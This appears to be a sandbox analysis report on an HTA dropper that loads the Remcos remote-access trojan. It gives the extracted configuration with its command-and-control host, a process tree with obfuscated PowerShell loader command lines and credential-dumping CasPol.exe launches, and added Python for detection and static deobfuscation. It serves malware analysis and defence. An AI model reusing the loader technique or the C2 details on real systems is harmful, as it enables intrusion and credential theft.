Analysis

  • max time kernel
    148s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-01-2025 10:15

General

  • Target

    nicegirlkissedmewithloverissingmegoodgreatthings.hta

  • Size

    491KB

  • MD5

    4b953e9801ac2ec60bf284162ed6793d

  • SHA1

    090650754ac26c80128fed9b425000f3167551f4

  • SHA256

    c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec

  • SHA512

    f5d19a017a961229db0c10e06fe1da6a78693490d2928a6931ad5945ea93fa6b7bc193ae4c89f527702003293a05e7aba4618bba1c24508ef36015609ab4aa5a

  • SSDEEP

    768:PnQVWUUGY6qZFKN9xv7RmzmBLStxuzHtu1Dj0YNYlBdNpdCb8sOUw8Qp3/GHxwv2:JRkKyMIBK2r0a8i4h

Malware Config

Extracted

Family

remcos

Botnet

zynova

C2

millionairedreams2025.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-MGAETQ

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs commands through powershell.exe.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
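Taken together, the signatures above describe one process-tree shape: an HTA run by mshta.exe spawns cmd.exe and an obfuscated powershell.exe; that PowerShell compiles C# on the fly (the csc.exe/cvtres.exe pair is what Add-Type produces) and drops a .vbS that relaunches PowerShell; and CasPol.exe, the .NET Code Access Security Policy tool, is started with no arguments as the injection host (SetThreadContext, MapViewOfSection on PID 1304) and then re-spawned three times with /stext, the NirSoft save-to-text switch that MailPassView and WebBrowserPassView use to write their dumps. The Python below is an added example, not part of the sandbox report: it encodes those shapes as rules over process-creation events (the fields any Sysmon Event ID 1 or EDR feed provides) and runs them over events constructed from the PIDs, images and command lines in the Processes section of this page, with the long base64 blobs replaced by "...".

```python
"""Process-tree detection for the chain reported on this page: script host -> interpreter, obfuscated
PowerShell, runtime C# compilation, CasPol.exe as an injection host, and CasPol.exe re-spawned with
the NirSoft /stext switch. Added example, not sandbox output; SAMPLE_EVENTS is constructed from the
PIDs, images and command lines in the Processes section (long base64 blobs replaced by '...')."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe"}
EXEC_BYPASS = re.compile(r"-e\w*\s+bypass\b", re.I)                   # -ex / -ep / -executionpolicy bypass
HIDDEN_WIN = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)  # -w 1 is -WindowStyle Hidden
CHAR_CAST = re.compile(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", re.I)
IEX = re.compile(r"invoke-expression|\biex\b", re.I)
B64 = re.compile(r"frombase64string", re.I)
STEXT = re.compile(r"\s/stext\s", re.I)                                # NirSoft "save as text" switch


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the (possibly quoted) executable path."""
    s = cmdline.strip()
    end = s.find('"', 1) + 1 if s.startswith('"') else len(s.split(None, 1)[0])
    return bool(s[end:].strip())


def find_suspicious(events):
    """Return (pid, reason) pairs; one process can trip several rules."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = image_name(parent.image) if parent else ""
        if pname in SCRIPT_HOSTS and name in INTERPRETERS:
            hits.append((e.pid, f"{pname} spawned {name}"))
        if name == "powershell.exe":
            if EXEC_BYPASS.search(e.cmdline) and HIDDEN_WIN.search(e.cmdline):
                hits.append((e.pid, "ExecutionPolicy Bypass with hidden window"))
            if IEX.search(e.cmdline) and (CHAR_CAST.search(e.cmdline) or B64.search(e.cmdline)):
                hits.append((e.pid, "Invoke-Expression over [char]/base64-built script"))
        if name == "csc.exe" and pname == "powershell.exe":
            hits.append((e.pid, "PowerShell compiling C# at runtime (Add-Type)"))
        if name == "caspol.exe" and pname in INTERPRETERS | SCRIPT_HOSTS and not has_arguments(e.cmdline):
            hits.append((e.pid, "CasPol.exe started with no arguments (injection host)"))
        if name == "caspol.exe" and pname == "caspol.exe" and STEXT.search(e.cmdline):
            hits.append((e.pid, "CasPol.exe re-spawned with NirSoft /stext dump switch"))
    return hits


NET2 = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727"
NET4 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed from the Processes section; parent of the root mshta.exe is not reported
    ProcEvent(2096, 0, r"C:\Windows\SysWOW64\mshta.exe",
              r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicegirlkissedmewithloverissingmegoodgreatthings.hta"'),
    ProcEvent(2740, 2096, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn(...)"'),
    ProcEvent(2704, 2740, PS,
              "pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; "
              "INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'...')))"),
    ProcEvent(3016, 2704, NET2 + r"\csc.exe", '"' + NET2 + r'\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkvskyfr.cmdline"'),
    ProcEvent(2716, 3016, NET2 + r"\cvtres.exe", NET2 + r'\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0C6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF0C5.tmp"'),
    ProcEvent(1132, 2704, r"C:\Windows\SysWOW64\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"'),
    ProcEvent(2920, 1132, PS,
              '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoProfile -Command '
              '"[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\'...\')) | Invoke-Expression"'),
    ProcEvent(1304, 2920, NET4 + r"\CasPol.exe", '"' + NET4 + r'\CasPol.exe"'),
    ProcEvent(1952, 1304, NET4 + r"\CasPol.exe", NET4 + r'\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xsdurkhtmpipnuybxcz"'),
    ProcEvent(288, 1304, NET4 + r"\CasPol.exe", NET4 + r'\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zmjnjcsuixaupavfgnllpzc"'),
    ProcEvent(828, 1304, NET4 + r"\CasPol.exe", NET4 + r'\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\koofkudowfszagjjpxgnsexrow"'),
]

if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(pid, reason)
```

Run against the constructed tree, the rules flag 2740, 2704, 3016, 2920, 1304, 1952, 288 and 828 and leave mshta.exe (2096), cvtres.exe (2716) and WScript.exe (1132) alone; the CasPol.exe rules are the highest-confidence ones, since the tool has no legitimate reason to run with an empty command line or to be relaunched by itself.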

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicegirlkissedmewithloverissingmegoodgreatthings.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'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'+[ChAr]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'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'+[ChAr]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkvskyfr.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3016
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0C6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF0C5.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2716
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2920
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1304
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xsdurkhtmpipnuybxcz"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1952
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zmjnjcsuixaupavfgnllpzc"
                7⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:288
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\koofkudowfszagjjpxgnsexrow"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:828
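The two powershell.exe command lines above are different wrappings of the same trick. Stage 1 (PID 2704) uses abbreviated switches (`-eX bYPass` for -ExecutionPolicy Bypass, `-NOp` for -NoProfile, `-W 1` for -WindowStyle Hidden), first runs DeviceCredentialDeployment.exe, a signed Windows binary documented on LOLBAS as a way to hide the calling console window (the behaviour the "Evasion via Device Credential Deployment" signature refers to), then assembles the string `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` out of single-quoted fragments and `[char]` casts (58 and 0x3a are `:`, 34 and 0x22 are `"`) so that neither `::` nor the quotes appear literally, and feeds it through two nested Invoke-Expression calls. Stage 2 (PID 2920) decodes a second blob as UTF-16LE (`Unicode`) and pipes it to Invoke-Expression. The mixed case only defeats case-sensitive string matching; the payload is fully recoverable without executing anything. The Python below is an added example, not code from the report or from the sample: it folds the concatenation statically and decodes the payload for both stage shapes. The base64 payloads in it are constructed placeholders, because the report elides the real blobs.

```python
"""Statically unwrap the Invoke-Expression / [char] concatenation / FromBase64String layering in
the two powershell.exe command lines above. Added example, not sandbox output; the base64 payloads
are constructed stand-ins for the blobs the report elides, not the sample's real stages."""
import base64
import re

# .NET encoding properties as written after [System.Text.Encoding]:: (matched case-insensitively)
ENCODINGS = {"utf8": "utf-8", "unicode": "utf-16-le", "bigendianunicode": "utf-16-be", "ascii": "ascii"}

# The only things allowed in the concatenation: quoted literals, [char] casts and '+'
TOKEN = re.compile(r"""
      '((?:[^']|'')*)'                  # single-quoted literal ('' is an escaped quote)
    | "((?:[^"]|"")*)"                  # double-quoted literal (variable expansion not handled)
    | \[char\]\s*(0x[0-9a-f]+|\d+)      # [char]58 or [char]0x3a
    | (\+)                              # concatenation operator
""", re.IGNORECASE | re.VERBOSE)
IEX_CALL = re.compile(r"(?:invoke-expression|iex)\s*\(", re.IGNORECASE)
B64_CALL = re.compile(
    r"\[(?:System\.)?Text\.Encoding\]::(\w+)\.GetString\(\s*"
    r"\[(?:System\.)?Convert\]::FromBase64String\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)\s*\)",
    re.IGNORECASE,
)


def innermost_iex_argument(cmdline: str) -> str:
    """Return the text inside the innermost Invoke-Expression( ... ), ignoring parentheses in quotes."""
    starts = [m.end() for m in IEX_CALL.finditer(cmdline)]
    if not starts:
        raise ValueError("no Invoke-Expression( call in command line")
    start = starts[-1]                    # last textual occurrence is the innermost call
    depth, quote = 1, None
    for i in range(start, len(cmdline)):
        c = cmdline[i]
        if quote:
            if c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return cmdline[start:i]
    raise ValueError("unbalanced parentheses in Invoke-Expression argument")


def fold_concat(expr: str) -> str:
    """Evaluate 'lit'+[char]58+[char]0x3a+'lit' without running PowerShell; refuse anything else."""
    parts, pos = [], 0
    for m in TOKEN.finditer(expr):
        if expr[pos:m.start()].strip():
            raise ValueError(f"unsupported syntax near {expr[pos:m.start()]!r}")
        pos = m.end()
        if m.group(1) is not None:
            parts.append(m.group(1).replace("''", "'"))
        elif m.group(2) is not None:
            parts.append(m.group(2).replace('""', '"'))
        elif m.group(3) is not None:
            num = m.group(3)
            parts.append(chr(int(num, 16 if num.lower().startswith("0x") else 10)))
    if expr[pos:].strip():
        raise ValueError(f"unsupported syntax near {expr[pos:]!r}")
    return "".join(parts)


def decode_base64_stage(ps: str) -> str:
    """Decode [Text.Encoding]::X.GetString([Convert]::FromBase64String('...')) to the next stage."""
    m = B64_CALL.search(ps)
    if not m:
        raise ValueError("no Encoding.GetString(FromBase64String(...)) pattern found")
    return base64.b64decode(m.group(2)).decode(ENCODINGS[m.group(1).lower()])


def unwrap(cmdline: str) -> str:
    """Stage 1 (nested IEX over a [char]-built string) and stage 2 (decode piped to IEX) both end here."""
    if IEX_CALL.search(cmdline):
        return decode_base64_stage(fold_concat(innermost_iex_argument(cmdline)))
    return decode_base64_stage(cmdline)


# Constructed payloads standing in for the elided base64 blobs.
STAGE1_PLAIN = "Write-Output 'constructed stage-2 placeholder'"
STAGE2_PLAIN = "Write-Output 'constructed stage-3 placeholder'"
STAGE1_B64 = base64.b64encode(STAGE1_PLAIN.encode("utf-8")).decode()      # stage 1 decodes as UTF8
STAGE2_B64 = base64.b64encode(STAGE2_PLAIN.encode("utf-16-le")).decode()  # stage 2 decodes as Unicode
# Same shape as the cmd.exe -> powershell.exe command line (PID 2704) above.
STAGE1_CMDLINE = (
    "pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; "
    "INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58"
    "+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'"
    + STAGE1_B64 + "'+[ChAr]0x22+'))')))"
)
# Same shape as the WScript.exe -> powershell.exe command line (PID 2920) above.
STAGE2_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoProfile -Command '
    '"[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\'' + STAGE2_B64
    + '\')) | Invoke-Expression"'
)

if __name__ == "__main__":
    print(fold_concat(innermost_iex_argument(STAGE1_CMDLINE)))   # the rebuilt inner expression
    print(unwrap(STAGE1_CMDLINE))
    print(unwrap(STAGE2_CMDLINE))
```

`fold_concat` deliberately refuses anything that is not a literal, a `[char]` cast or `+`: if a variant adds `-join`, `-replace` or a `$variable`, it raises instead of silently producing a wrong string, which is the point at which the sample should go to a sandboxed PowerShell with `Set-PSDebug -Trace` or script block logging rather than to a static folder.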

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESF0C6.tmp

    Filesize

    1KB

    MD5

    d3182fd744fd971a6c177cafc66cd3f6

    SHA1

    cd526fd8d0934d3d87e8abb8a3ed7270b879ab26

    SHA256

    192bec82dd3a41c8741e60b5ef372d299caf9cbe5b9fa6b9b06500c0c51cba43

    SHA512

    bff6ae398d4ffff3cbb59ca364b50d033f2647952e0a75fa94adf5cc3b39d5acefb5027375f68d2152e5263bed5bb7804967305a426760936a3af43c1466bf1d

  • C:\Users\Admin\AppData\Local\Temp\gkvskyfr.dll

    Filesize

    3KB

    MD5

    c93eeeeb9161ba72654ea27562e334af

    SHA1

    73ecb604d60397dcdf06ed73ff9a5167c66e4a72

    SHA256

    f8e3bb55e9e3a7d96a99009d0f9c4f315fcd6c944124cfbb69d43797718c3a13

    SHA512

    94781126b44395be010452503e1e95134bb68d1a7bbb37e1ba470e6fcca797ba28d0269935a28beba23a06eed64912b50e15542399bb045c716da4b58722ad8e

  • C:\Users\Admin\AppData\Local\Temp\gkvskyfr.pdb

    Filesize

    7KB

    MD5

    f69aa2b07412dfbfc819134e659bffc5

    SHA1

    94a6507eef8bba2bc897c81d1372c6246079c2eb

    SHA256

    09bbc4a69d02a6185cb2496869e662640c02ad0b811b1203478f86acfc3b737d

    SHA512

    9de38200c0d0dcf862cdd1a8de7226352bff1a118d796fa530c768c160b406d1623cf81b0ce99ffdfb15ba755cf1ae680664d600ee6e1f9535b90aafb3a8094f

  • C:\Users\Admin\AppData\Local\Temp\xsdurkhtmpipnuybxcz

    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    48c64f15a12ee829afa7d5dad67e429f

    SHA1

    3b1a619cd853d9c5bf16b1005d23ce39604a0999

    SHA256

    38abe4e1a3085dc82819b637edb8e70440e7afd8dd3a04c1d81034bf9de695ca

    SHA512

    cecf3537166d70735c36a45ec50a6bdc8bf539fbce9f3be5be2ec66efee426266b0155df8b167645c1069025094f36ae8ddb050cfda49c20f41bc6ed91262bad

  • C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

    Filesize

    213KB

    MD5

    b14ef4fa92414ea1658977a049f15306

    SHA1

    11e59f935817673e2b68cfd36e4ce93d15034714

    SHA256

    a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

    SHA512

    8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF0C5.tmp

    Filesize

    652B

    MD5

    edc19668225343ec3da80fe0e613f3ff

    SHA1

    058190999ec3827d0216a5f466cf20efbabb02a8

    SHA256

    1dbb4d7bbef2580ad6795f3c92cc39c9662fab63589ee525d809192f9661ab60

    SHA512

    55fbf919ed2571cd04c55eabd7fb4d1ed8169eafbf66332b2e5fc3c8e872b5237a85c844bee1b00a707619b02afed888a567a3b193b42135a9900315d147fe1a

  • \??\c:\Users\Admin\AppData\Local\Temp\gkvskyfr.0.cs

    Filesize

    478B

    MD5

    680c55127532e413a19eddb51b0cb473

    SHA1

    7d279e255bc675f1c09df8b210ee4472b5d3b8b6

    SHA256

    fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

    SHA512

    27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

  • \??\c:\Users\Admin\AppData\Local\Temp\gkvskyfr.cmdline

    Filesize

    309B

    MD5

    d43ae0d5ef10f74a696829ebfea4d7c6

    SHA1

    cadb45cac43d8f92cbfd3b066baadb11a6a0a7b3

    SHA256

    2121c66c63da9346f6d2bfa27f9224d23a3cb47b6df2feb649bb485ca7d5b0e9

    SHA512

    285e5e7f35a7114b69755f7c749980e7fd6991aeb2a392fef2b785d90bb0c12f65dc4940b7de222fbcf41c4308127a7c8d29e40da9e109afa3986f462e91b175

  • memory/288-58-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/288-57-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/288-63-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/828-61-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/828-60-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/828-62-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/1304-51-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-75-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-33-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-45-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-46-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-47-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-48-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-35-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-37-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-84-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-39-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-83-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-41-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1304-42-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-44-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-81-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-43-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-29-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-69-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1304-73-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1304-72-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1304-74-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-31-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-76-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-77-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-79-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1304-80-0x0000000000400000-0x0000000000480000-memory.dmp

    Filesize

    512KB

  • memory/1952-53-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1952-54-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1952-55-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB